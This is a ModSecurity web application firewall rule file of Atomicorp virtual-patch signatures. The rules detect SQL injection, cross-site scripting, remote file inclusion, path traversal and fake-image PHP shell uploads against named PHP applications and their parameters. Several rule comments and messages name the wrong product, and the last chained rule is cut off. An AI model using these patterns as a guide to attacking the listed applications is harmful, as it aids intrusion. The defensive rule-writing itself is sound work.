SecRule REQUEST_URI "/index\.php" "chain, id:390775,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: TClanPortal id SQL Injection Vulnerability',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
SecRule ARGS:id|ARGS:action "(?:(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[a-z|0-9|\*| |\,]+[[:space:]]+(?:from|into|table|database|index|view)[[:space:]]+[a-z|0-9|\*| |\,]|union.*select)"
# Rule 310019: SaphpLesson "forumid" SQL Injection Vulnerability
SecRule REQUEST_URI "/(?:showcat|add)\.php" "chain,id:320113,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: SaphpLesson forumid SQL Injection Vulnerability',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
SecRule ARGS:forumid "(?:(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[a-z|0-9|\*| |\,]+[[:space:]]+(?:from|into|table|database|index|view)[[:space:]]+[a-z|0-9|\*| |\,]|\')"
# Rule 310019: News2net "category" SQL Injection Vulnerability
SecRule REQUEST_URI "index\.php" "chain,t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,id:390686,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PHP id variable SQL injection vulnerability'"
SecRule ARGS:category "(?:(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[a-z|0-9|\*| |\,]+[[:space:]]+(?:from|into|table|database|index|view)[[:space:]]+[a-z|0-9|\*| |\,]|union.*select.*into.*from)"
# Rule 310019: Peel "rubid" SQL Injection Vulnerability
SecRule REQUEST_URI "index\.php" "chain,t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,id:393300,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Peel rubid SQL Injection Vulnerability'"
SecRule ARGS:rubid "(?:(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[a-z|0-9|\*| |\,]+[[:space:]]+(?:from|into|table|database|index|view)[[:space:]]+[a-z|0-9|\*| |\,]|\'|union.*select.*into.*from)"
# Rule 310019:
SecRule ARGS:mosconfig_absolute_path "(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/" "id:393376,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Generic mosConfig_absolute_path File Inclusion Vulnerability'"
# Rule 310019: Cyphor Forum SQL Injection Exploit
SecRule REQUEST_URI "show\.php" "chain,t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,id:392659,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Cyphor Forum SQL Injection Exploit'"
SecRule ARGS:id|ARGS:fid "(?:\'|union.*select)"
# Rule 310019: WSN Forum "id" SQL Injection Vulnerability
SecRule REQUEST_URI "/memberlist\.php" "chain,t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,id:390659,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WSN Forum id SQL Injection Vulnerability'"
SecRule ARGS:id "(?:(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[a-z|0-9|\*| |\,]+[[:space:]]+(?:from|into|table|database|index|view)[[:space:]]+[a-z|0-9|\*| |\,]|\'|union.*select.*into.*from)"
# Rule 310019: Tunez SQL Injection and Cross-Site Scripting Vulnerabilities
SecRule REQUEST_URI "/songinfo\.php" "chain,t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,id:390660,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Tunez SQL Injection and Cross-Site Scripting Vulnerabilities'"
SecRule ARGS:songid "(?:(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[a-z|0-9|\*| |\,]+[[:space:]]+(?:from|into|table|database|index|view)[[:space:]]+[a-z|0-9|\*| |\,]|\'|union.*select.*into.*from)"
# Rule 310019: phpComasy "id" SQL Injection Vulnerability
SecRule REQUEST_URI "/index\.php" "chain,t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,id:390685,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PHP id variable SQL injection vulnerability'"
SecRule ARGS:id "(?:(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[a-z|0-9|\*| |\,]+[[:space:]]+(from|into|table|database|index|view)[[:space:]]+[a-z|0-9|\*| |\,]|union.*select.*into.*from)"
# Rule 310019: sNews "index.php" SQL Injection Vulnerabilities
SecRule REQUEST_URI "/index\.php" "t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,chain,id:310557,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: ActiveCampaign SupportTrio Inclusion Vulnerability'"
SecRule ARGS:id|ARGS:category "(?:(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[a-z|0-9|\*| |\,]+[[:space:]]+(from|into|table|database|index|view)[[:space:]]+[a-z|0-9|\*| |\,]|union.*select.*into.*from)"
# Rule 310019: phpWordPress SQL Injection Vulnerabilities
SecRule REQUEST_URI "/index\.php" "chain,id:343433,rev:5,severity:2,msg:'Atomicorp.com WAF Rules: Just in Time Virtual Patch: SQL injection',chain"
SecRule ARGS:poll|ARGS:category|ARGS:ctg "(?:(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[a-z|0-9|\*| |\,]+[[:space:]]+(from|into|table|database|index|view)[[:space:]]+[a-z|0-9|\*| |\,]|union.*select.*into.*from)" "t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase"
# Rule 310019: ActiveCampaign KnowledgeBuilder SQL Injection
SecRule REQUEST_URI "/index\.php" "chain,t:none,t:urlDecodeUni,t:lowercase,id:313979,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: ActiveCampaign KnowledgeBuilder SQL Injection',chain"
SecRule ARGS:article "(?:(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[a-z|0-9|\*| |\,]+[[:space:]]+(from|into|table|database|index|view)[[:space:]]+[a-z|0-9|\*| |\,]|union.*select.*into.*from)" "t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,chain"
SecRule REQUEST_URI "!(/index.php\?act=update&)" "t:none,t:urlDecodeUni,t:lowercase"
# Rule 310019: DMANews Multiple SQL Injection Vulnerabilities
SecRule REQUEST_URI "/index\.php" "chain,t:none,t:urlDecodeUni,t:lowercase,chain,id:374533,rev:3,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: SQL injection attack'"
SecRule ARGS:id|ARGS:sortorder|ARGS:display_num "(?:(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[a-z|0-9|\*| |\,]+[[:space:]]+(from|into|table|database|index|view)[[:space:]]+[a-z|0-9|\*| |\,]|union.*select.*into.*from)" "t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase"
# Rule 310019: bogus graphics file
SecRule REQUEST_HEADERS:Content-Disposition "\.php" "chain,id:310019,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Fake gif file shell attack',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
SecRule REQUEST_HEADERS:Content-Type "(?:image/gif|image/jpg|image/png|image/bmp)"
# Rule 310019: PhpX <= 3.5.9 SQL Injection -> login bypass -> remote command/code execution
#SecRule REQUEST_URI "files/.*\.php\.menu\?cmd=" # "t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,id:390658,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PhpX <= 3.5.9 SQL Injection -> login bypass -> remote command/code execution'"
# Rule 310019: Coppermine Photo Gallery "relocate_server.php" Exposure of Configuration
SecRule REQUEST_URI "/relocate_server\.php" "id:390205,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Coppermine Photo Gallery relocate_server.php Exposure of Configuration'"
# Rule 310019: WebCalendar http Response Splitting and SQL Injection Vulnerabilities
SecRule REQUEST_URI "/edit_report_handler\.php" "chain,id:390206,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WebCalendar http Response Splitting and SQL Injection Vulnerabilities'"
SecRule ARGS:time_range "(?:(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[a-z|0-9|\*| |\,]+[[:space:]]+(from|into|table|database|index|view)[[:space:]]+[a-z|0-9|\*| |\,]|\'|union.*select.*from)" "t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase"
# Rule 310019: WebCalendar http Response Splitting and SQL Injection Vulnerabilities
SecRule REQUEST_URI "/layers_toggle\.php" "chain,id:390207,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WebCalendar http Response Splitting and SQL Injection Vulnerabilities',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
SecRule ARGS:ret "HTTP"
# Rule 310019: Zainu SQL Injection Vulnerabilities
SecRule REQUEST_URI "/index\.php" "chain,t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,id:390684,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Zainu SQL Injection Vulnerabilities'"
SecRule ARGS:start|ARGS:term "(?:(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[a-z|0-9|\*| |\,]+[[:space:]]+(from|into|table|database|index|view)[[:space:]]+[a-z|0-9|\*| |\,]|union.*select.*from)" "t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase"
# Rule 310019: Cars Portal SQL Injection Vulnerabilities
SecRule REQUEST_URI "/index\.php" "chain,t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,id:390770,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Cars Portal SQL Injection'"
SecRule ARGS:page|ARGS:car "(?:(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[a-z|0-9|\*| |\,]+[[:space:]]+(from|into|table|database|index|view)[[:space:]]+[a-z|0-9|\*| |\,]|union.*select.*from)"
# Rule 310019: honeypot
SecRule REQUEST_URI "/tiki-view_forum_thread\.php" "chain,id:390083,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: tikiwiki XSS Vulnerability',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
SecRule ARGS:comments_parentId|ARGS:forumId|ARGS:topics_offset "(<+(script|about|applet|activex|chrome)|onmouseover=\'javascript)"
# Rule 310019: honeypot
SecRule REQUEST_URI "/tiki-view_forum_thread\.php" "chain,id:393382,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: tikiwiki Remote File Inclusion Vulnerability',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
SecRule ARGS:comments_parentId|ARGS:forumId|ARGS:topics_offset "(?:gopher|ogg|zlib|(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)"
# Rule 310019: honeypot
SecRule REQUEST_URI "index\.php\?p=(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/" "id:390208,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Generic Remote PHP injection',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
# Rule 310019: PHPNuke-Clan "vwar_root" File Inclusion Vulnerability
#VWar <= 1.5.0 R12 Remote File Inclusion Exploit
SecRule REQUEST_URI "(/includes/functions_(common|install)|/includes/get_header)\.php" "chain,id:390039,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: vwar_root remote/local file inclusion',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
SecRule ARGS:vwar_root "((?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/|\.\./\.\.)"
# Rule 310019: aWebBB Multiple Vulnerabilities
SecRule REQUEST_URI "post\.php" "chain,id:390001,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: aWebBB XSS attack on post.php',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
SecRule ARGS:tname|ARGS:fpost "((javascript|script|about|applet|activex|chrome)*\>|html|(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)"
# Rule 310019: aWebBB Multiple Vulnerabilities
SecRule REQUEST_URI "editac\.php" "chain,id:390002,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: aWebBB XSS attack on editac.php',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
SecRule ARGS:fullname|ARGS:emailadd|ARGS:country|ARGS:sig|ARGS:otherav "((javascript|script|about|applet|activex|chrome)*\>|html|(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)"
# Rule 310019: aWebBB Multiple Vulnerabilities
SecRule REQUEST_URI "register\.php" "chain,id:390003,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: aWebBB XSS attack on register.php',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
SecRule ARGS:fullname|ARGS:emailadd|ARGS:country "((javascript|script|about|applet|activex|chrome)*\>|html|(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)"
# Rule 310019: aWebBB Multiple Vulnerabilities
SecRule REQUEST_URI "(?:accounts|changep|editac|feedback|fpass|login|post|reply|reply_log)\.php" "chain,id:390004,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Possible SQL injection attack',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
SecRule ARGS:username "(?:(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[a-z|0-9|\*| |\,]+[[:space:]]+(from|into|table|database|index|view)[[:space:]]+[a-z|0-9|\*|\,]|union.*select.*from)"
# Rule 310019: aWebBB Multiple Vulnerabilities
SecRule REQUEST_URI "dpost\.php" "chain,id:391104,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: aWebBB SQL attack',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
SecRule ARGS:p "(?:(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[a-z|0-9|\*| |\,]+[[:space:]]+(?:from|into|table|database|index|view)[[:space:]]+[a-z|0-9|\*| |\,]|\'|union.*select.*from)"
# Rule 310019: aWebBB Multiple Vulnerabilities
SecRule REQUEST_URI "(?:ndis|list)\.php" "chain,id:390005,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: aWebBB SQL attack',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
SecRule ARGS:c "(?:(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[a-z|0-9|\*| |\,]+[[:space:]]+(?:from|into|table|database|index|view)[[:space:]]+[a-z|0-9|\*| |\,]|union.*select.*from)"
# Rule 310019: phpBB "cur_password" Cross-Site Scripting Vulnerability
SecRule REQUEST_URI "profile\.php" "chain,id:390006,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpBB cur_password XSS attack',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
SecRule ARGS:cur_password "(?:(?:javascript|script|about|applet|activex|chrome)*\>|html|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)"
# Rule 310019: PHPNuke-Clan 3.0.1 Remote File Inclusion Exploit
SecRule REQUEST_URI "modules/vWar_Account/includes/functions_(?:common|front)\.php" "chain,id:390007,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PHPNuke-Clan 3.0.1 Remote File Inclusion Exploit',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
SecRule ARGS:vwar_root2 "^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/"
# Rule 310019: Claroline <= 1.7.4 scormExport.inc.php remote command vuln
SecRule REQUEST_URI "scormExport\.inc\.php" "chain,id:390008,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Claroline <= 1.7.4 scormExport.inc.php remote command vuln',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
SecRule ARGS:includePath "(?:^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/|\.\./\.\.)"
# Rule 310019: Claroline <= 1.7.4 scormExport.inc.php remote command vuln
SecRule REQUEST_URI "scormExport\.inc\.php\?cmd=" "id:390009,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Claroline <= 1.7.4 scormExport.inc.php remote command vuln',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
# Rule 310019: Claroline <= 1.7.4 XSS and recursion attack
SecRule REQUEST_URI "rqmkhtml\.php" "chain,id:390010,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Claroline <= 1.7.4 XSS attack',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
SecRule ARGS:cmd "(?:rqEdit|rwEditHtml)" chain
SecRule ARGS:file "(?:><|\.\./\.\.)"
# Rule 310019: aWebNews Multiple Vulnerabilities
SecRule REQUEST_URI "visview\.php" "chain,id:390011,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: aWebNews XSS attack',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
SecRule ARGS:yname|ARGS:emailadd|ARGS:subject|ARGS:comment "(?:(?:javascript|script|about|applet|activex|chrome)*\>|html|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)"
# Rule 310019: aWebNews Multiple Vulnerabilities
SecRule REQUEST_URI "(?:login|fpass)\.php" "chain,id:390012,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: aWebBBNewsSQL attack',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
SecRule ARGS:user123 "(?:(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[a-z|0-9|\*| |\,]+[[:space:]]+(?:from|into|table|database|index|view)[[:space:]]+[a-z|0-9|\*| |\,]|\'|union.*select.*from)"
# Rule 310019: aWebNews Multiple Vulnerabilities
SecRule REQUEST_URI "visview\.php" "chain,id:390013,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: aWebBBNewsSQL attack',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
SecRule ARGS:cid "(?:(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[a-z|0-9|\*| |\,]+[[:space:]]+(?:from|into|table|database|index|view)[[:space:]]+[a-z|0-9|\*| |\,]|\'|union.*select.*from)"
# Rule 310019: qliteNews "loginprocess.php" SQL Injection Vulnerability
SecRule REQUEST_URI "loginprocess\.php" "chain,id:390015,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: qliteNEws SQL injection attack',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
SecRule ARGS:username "(?:(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[a-z|0-9|\*| |\,]+[[:space:]]+(?:from|into|table|database|index|view)[[:space:]]+[a-z|0-9|\*| |\,]|\'|union.*select.*from)"
# Rule 310019: RedCMS SQL Injection and Script Insertion Vulnerabilities
SecRule REQUEST_URI "profile\.php" "chain,id:390017,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: RedCMS SQL Injection',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
SecRule ARGS:u "(?:(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[a-z|0-9|\*| |\,]+[[:space:]]+(?:from|into|table|database|index|view)[[:space:]]+[a-z|0-9|\*| |\,]|\'|union.*select.*from)"
# Rule 310019: RedCMS SQL Injection and Script Insertion Vulnerabilities
SecRule REQUEST_URI "register\.php" "chain,id:390018,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: RedCMS XSS attack',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
SecRule ARGS:Email|ARGS:Location|ARGS:Website "(?:javascript|script|about|applet|activex|chrome)*>"
# Rule 310019: Oxygen "fid" SQL Injection Vulnerability
SecRule REQUEST_URI "post\.php" "chain,id:390019,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Oxygen SQL Injection',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
SecRule ARGS:fid "(?:(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[a-z|0-9|\*| |\,]+[[:space:]]+(?:from|into|table|database|index|view)[[:space:]]+[a-z|0-9|\*| |\,]|\'|union.*select.*from)"
# Rule 310019: Mantis Cross-Site Scripting Vulnerabilities
SecRule REQUEST_URI "view_set_all\.php" "chain,id:390020,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Mantis XSS attack',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
SecRule ARGS:start_day|ARGS:start_year|ARGS:start_month "(?:(?:javascript|script|about|applet|activex|chrome)*\>|html|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)"
# Rule 310019: vCounter "url" SQL Injection Vulnerability
SecRule REQUEST_URI "vCounter\.php" "chain,id:390021,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Oxygen SQL Injection',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
SecRule ARGS:url "(?:(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[a-z|0-9|\*| |\,]+[[:space:]]+(?:from|into|table|database|index|view)[[:space:]]+[a-z|0-9|\*| |\,]|\'|union.*select.*from)"
# Rule 310019: PHP Classifieds "searchword" Cross-Site Scripting Vulnerability
SecRule REQUEST_URI "search\.php" "chain,id:390022,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Mantis XSS attack',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
SecRule ARGS:searchword "(?:(?:javascript|script|about|applet|activex|chrome)*\>|html|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)"
# Rule 310019: PHPCollab v2.x / netOffice v2.x sendpassword.php SQL Injection
SecRule REQUEST_URI "/sendpassword\.php\?action=send" "chain,id:390023,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PHPCollab v2.x / netOffice v2.x sendpassword.php SQL Injection',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
SecRule REQUEST_BODY "union select.*concat.*password.*admin\.php"
# Rule 310019: Sourceworkshop newsletter "email" SQL Injection Vulnerability
SecRule REQUEST_URI "/newsletter\.php" "chain,id:390024,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Sourceworkshop newsletter SQL Injection Vulnerability',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
SecRule ARGS:newsletteremail "(?:(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[a-z|0-9|\*| |\,]+[[:space:]]+(?:from|into|table|database|index|view)[[:space:]]+[a-z|0-9|\*| |\,]|\'|union.*select.*from)"
# Rule 310019: X-Changer SQL Injection Vulnerabilities
SecRule REQUEST_URI "/index\.php" "chain,id:390025,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: X-Changer SQL Injection Vulnerability',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
SecRule ARGS:from|ARGS:into|ARGS:id "(?:(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[a-z|0-9|\*| |\,]+[[:space:]]+(?:from|into|table|database|index|view)[[:space:]]+[a-z|0-9|\*| |\,]|\'|union.*select.*from)"
# Rule 310019: Null news Multiple SQL Injection Vulnerabilities
SecRule REQUEST_URI "/(?:sub|unsub)\.php" "chain,id:390027,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Null news Multiple SQL Injection Vulnerabilities',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
SecRule ARGS:user_username "(?:(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[a-z|0-9|\*| |\,]+[[:space:]]+(?:from|into|table|database|index|view)[[:space:]]+[a-z|0-9|\*| |\,]|\'|union.*select.*from)"
# Rule 310019: Null news Multiple SQL Injection Vulnerabilities
SecRule REQUEST_URI "/lostpass\.php" "chain,id:390028,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Null news Multiple SQL Injection Vulnerabilities',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
SecRule ARGS:user_email "(?:(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[a-z|0-9|\*| |\,]+[[:space:]]+(?:from|into|table|database|index|view)[[:space:]]+[a-z|0-9|\*| |\,]|\'|union.*select.*from)"
# Rule 310019: VSNS Lemon SQL injection Vulnerabilities
SecRule REQUEST_URI "/functions/final_functions\.php" "chain,id:390029,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Null news Multiple SQL Injection Vulnerabilities',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
SecRule ARGS:id "(?:(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[a-z|0-9|\*| |\,]+[[:space:]]+(?:from|into|table|database|index|view)[[:space:]]+[a-z|0-9|\*| |\,]|\'|union.*select.*from)"
# Rule 310019: PHPLiveHelper 1.8 remote command execution Xploit
SecRule REQUEST_URI "initiate\.php" "chain,id:390030,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PHPLiveHelper 1.8 remote command execution Xploit',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
SecRule ARGS:abs_path "^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/"
# Rule 310019: Pixel Motion Blog SQL Injection Vulnerabilities
SecRule REQUEST_URI "admin/index\.php" "chain,id:390031,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Pixel Motion Blog SQL Injection Vulnerabilities',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
SecRule ARGS:user|ARGS:pass "(?:(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[a-z|0-9|\*| |\,]+[[:space:]]+(?:from|into|table|database|index|view)[[:space:]]+[a-z|0-9|\*| |\,]|\'|union.*select.*from)"
# Rule 310019: Pixel Motion Blog SQL Injection Vulnerabilities
SecRule REQUEST_URI "index\.php" "chain,id:390032,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Pixel Motion Blog SQL Injection Vulnerabilities',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
SecRule ARGS:date "(?:(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[a-z|0-9|\*| |\,]+[[:space:]]+(?:from|into|table|database|index|view)[[:space:]]+[a-z|0-9|\*| |\,]|\'|union.*select.*from)"
# Rule 310019: Nuked-Klan "m" SQL Injection Vulnerability
SecRule REQUEST_URI "index\.php" "chain,id:390033,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Nuked-Klan SQL Injection Vulnerability',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
